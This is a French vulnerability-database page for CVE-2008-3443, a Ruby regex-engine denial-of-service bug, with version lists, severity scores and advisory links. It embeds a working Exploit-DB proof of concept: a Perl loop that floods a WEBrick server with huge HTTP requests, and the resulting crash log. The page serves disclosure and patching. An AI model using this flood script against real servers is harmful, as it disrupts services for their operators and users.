CVE-2008-3443 : Détail

CVE-2008-3443

18.83%V3
Network
2008-08-14
21h00 +00:00
2018-10-03
18h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The regular expression engine (regex.c) in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows remote attackers to cause a denial of service (infinite loop and crash) via multiple long requests to a Ruby socket, related to memory allocation failure, and as demonstrated against Webrick.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 6239

Date de publication : 2008-08-12 22h00 +00:00
Auteur : laurent gaffié
EDB Vérifié : Yes

------------------------------------------------------- Language : Ruby Web Site: www.ruby-lang.org Platform: All Bug: Remote Socket Memory Leak Products Affected: 1.8 series: - 1.8.5 and all prior versions - 1.8.6-p286 and all prior versions - 1.8.7-p71 and all prior versions 1.9 series - r18423 and all prior revisions Confirmed by the vendor: Yes Patch available : Yes ------------------------------------------------------- 1) Introduction 2) Bug 3) Proof of concept 4) Credits =============== 1) Introduction =============== "A dynamic, open source programming language with a focus on simplicity and productivity. It has an elegant syntax that is natural to read and easy to write." ======= 2) Bug ======= Ruby fails to handle properly the memory allocated for a socket So when you send ~ 4 big request to a ruby socket, ruby will go in infinite loop, and then crash. The bug reside in the regex engine (in regex.c). ================== 3)Proof of concept =================== This poc is an exemple for Webrick web server crap.pl : #!/usr/bin/perl use LWP::Simple; my $payload = "\x41" x 49999999; while(1) { print "[+]\n"; get "http://127.0.0.1:2500/".$payload.""; } Result (Exemple on Webrick web server): [2008-07-11 22:39:55] INFO WEBrick 1.3.1 [2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux] [2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500 [2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory /usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line' /usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse' /usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run' /usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread' /usr/lib/ruby/1.8/webrick/server.rb:162:in `start' /usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread' /usr/lib/ruby/1.8/webrick/server.rb:95:in `start' /usr/lib/ruby/1.8/webrick/server.rb:92:in `each' /usr/lib/ruby/1.8/webrick/server.rb:92:in `start' /usr/lib/ruby/1.8/webrick/server.rb:23:in `start' /usr/lib/ruby/1.8/webrick/server.rb:82:in `start' /home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch' script/server:62 [FATAL] failed to allocate memory root@audit:/home/audit# ===== 5)Credits ===== laurent gaffié laurent.gaffie{remove_this}[at]gmail[dot]com # milw0rm.com [2008-08-13]

Products Mentioned

Configuraton 0

Ruby-lang>>Ruby >> Version 1.6.8

    Ruby-lang>>Ruby >> Version 1.8.0

    Ruby-lang>>Ruby >> Version 1.8.1

    Ruby-lang>>Ruby >> Version 1.8.1

      Ruby-lang>>Ruby >> Version 1.8.2

      Ruby-lang>>Ruby >> Version 1.8.2

      Ruby-lang>>Ruby >> Version 1.8.2

      Ruby-lang>>Ruby >> Version 1.8.2

      Ruby-lang>>Ruby >> Version 1.8.3

      Ruby-lang>>Ruby >> Version 1.8.3

      Ruby-lang>>Ruby >> Version 1.8.3

      Ruby-lang>>Ruby >> Version 1.8.3

      Ruby-lang>>Ruby >> Version 1.8.4

      Ruby-lang>>Ruby >> Version 1.8.4

      Ruby-lang>>Ruby >> Version 1.8.4

      Ruby-lang>>Ruby >> Version 1.8.4

        Ruby-lang>>Ruby >> Version 1.8.5

        Ruby-lang>>Ruby >> Version 1.8.5

          Ruby-lang>>Ruby >> Version 1.8.5

            Ruby-lang>>Ruby >> Version 1.8.5

              Ruby-lang>>Ruby >> Version 1.8.5

                Ruby-lang>>Ruby >> Version 1.8.5

                  Ruby-lang>>Ruby >> Version 1.8.5

                    Ruby-lang>>Ruby >> Version 1.8.5

                      Ruby-lang>>Ruby >> Version 1.8.5

                        Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.6

                          Ruby-lang>>Ruby >> Version 1.8.6

                            Ruby-lang>>Ruby >> Version 1.8.6

                              Ruby-lang>>Ruby >> Version 1.8.6

                                Ruby-lang>>Ruby >> Version 1.8.6

                                  Ruby-lang>>Ruby >> Version 1.8.6

                                    Ruby-lang>>Ruby >> Version 1.8.6

                                      Ruby-lang>>Ruby >> Version 1.8.6

                                      Ruby-lang>>Ruby >> Version 1.8.6

                                      Ruby-lang>>Ruby >> Version 1.8.6

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.9.0

                                      Ruby-lang>>Ruby >> Version 1.9.0

                                        Références

                                        http://secunia.com/advisories/31430
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        https://usn.ubuntu.com/651-1/
                                        Tags : vendor-advisory, x_refsource_UBUNTU
                                        http://secunia.com/advisories/33185
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://www.debian.org/security/2009/dsa-1695
                                        Tags : vendor-advisory, x_refsource_DEBIAN
                                        http://support.apple.com/kb/HT3549
                                        Tags : x_refsource_CONFIRM
                                        http://www.securityfocus.com/bid/30682
                                        Tags : vdb-entry, x_refsource_BID
                                        http://securityreason.com/securityalert/4158
                                        Tags : third-party-advisory, x_refsource_SREASON
                                        http://secunia.com/advisories/35074
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://www.securitytracker.com/id?1021075
                                        Tags : vdb-entry, x_refsource_SECTRACK
                                        http://www.redhat.com/support/errata/RHSA-2008-0895.html
                                        Tags : vendor-advisory, x_refsource_REDHAT
                                        http://www.redhat.com/support/errata/RHSA-2008-0897.html
                                        Tags : vendor-advisory, x_refsource_REDHAT
                                        http://secunia.com/advisories/33398
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://secunia.com/advisories/32219
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        https://www.exploit-db.com/exploits/6239
                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                        http://www.us-cert.gov/cas/techalerts/TA09-133A.html
                                        Tags : third-party-advisory, x_refsource_CERT
                                        http://www.vupen.com/english/advisories/2009/1297
                                        Tags : vdb-entry, x_refsource_VUPEN
                                        https://usn.ubuntu.com/691-1/
                                        Tags : vendor-advisory, x_refsource_UBUNTU
                                        http://secunia.com/advisories/32371
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://secunia.com/advisories/32165
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://secunia.com/advisories/32372
                                        Tags : third-party-advisory, x_refsource_SECUNIA